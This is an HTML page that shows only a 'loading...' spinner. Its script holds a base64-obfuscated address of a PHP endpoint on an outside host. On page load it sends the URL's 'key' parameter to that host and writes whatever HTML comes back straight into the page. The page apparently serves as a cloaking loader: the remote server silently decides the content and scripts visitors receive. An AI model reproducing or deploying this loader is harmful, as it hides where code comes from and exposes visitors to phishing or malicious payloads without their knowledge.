<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <title>loading...</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <style>
<style>
 * {
	margin:0px;
	padding:0px;
	border:0px;
}
html,body {
	min-height:100%;
}
body {
	background:#f8f8f8;
}
.loader {
	position:absolute;
	top:0px;
	bottom:0px;
	left:0px;
	right:0px;
	margin:auto;
	width:175px;
	height:100px;
}
.loader span {
	display:block;
	background:#fcb34f;
	width:7px;
	height:10%;
	border-radius:14px;
	margin-right:5px;
	float:left;
	margin-top:25%;
}
.loader span:last-child {
	margin-right:0px;
}
.loader span:nth-child(1) {
	animation:load 2.5s 1.4s infinite linear;
}
.loader span:nth-child(2) {
	animation:load 2.5s 1.2s infinite linear;
}
.loader span:nth-child(3) {
	animation:load 2.5s 1s infinite linear;
}
.loader span:nth-child(4) {
	animation:load 2.5s 0.8s infinite linear;
}
.loader span:nth-child(5) {
	animation:load 2.5s 0.6s infinite linear;
}
.loader span:nth-child(6) {
	animation:load 2.5s 0.4s infinite linear;
}
.loader span:nth-child(7) {
	animation:load 2.5s 0.2s infinite linear;
}
.loader span:nth-child(8) {
	animation:load 2.5s 0s infinite linear;
}
.loader span:nth-child(9) {
	animation:load 2.5s 0.2s infinite linear;
}
.loader span:nth-child(10) {
	animation:load 2.5s 0.4s infinite linear;
}
.loader span:nth-child(11) {
	animation:load 2.5s 0.6s infinite linear;
}
.loader span:nth-child(12) {
	animation:load 2.5s 0.8s infinite linear;
}
.loader span:nth-child(13) {
	animation:load 2.5s 1s infinite linear;
}
.loader span:nth-child(14) {
	animation:load 2.5s 1.2s infinite linear;
}
.loader span:nth-child(15) {
	animation:load 2.5s 1.4s infinite linear;
}
@keyframes load {
	0% {
	background:#fcb34f;
	margin-top:25%;
	height:10%;
}
50% {
	background:#ff840b;
	height:100%;
	margin-top:0%;
}
100% {
	background:#ff840b;
	height:10%;
	margin-top:25%;
}
}</style>
</head>
<body>
<div class="loader">
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
    <span></span>
</div>
  <script>
    const apiUrl = "aHR0cHM6Ly9obWZuLmNuL0Nvcy9hcGkucGhw";

    function getQueryString(name) {
      const reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
      const r = window.location.search.substr(1).match(reg);
      return r ? decodeURIComponent(r[2]) : null;
    }

    window.onload = async function() {
      const url = getQueryString("key");
      const decodedApiUrl = atob(apiUrl);

      try {
        const response = await fetch(decodedApiUrl, {
          method: 'POST',
          headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
          body: `url=${encodeURIComponent(url)}`
        });

        const data = await response.json();

        setTimeout(() => {
          document.write(data.html);
        }, 200);

      } catch (error) {
        console.error('请求失败:', error);
      }
    };
  </script>
</body>
</html>
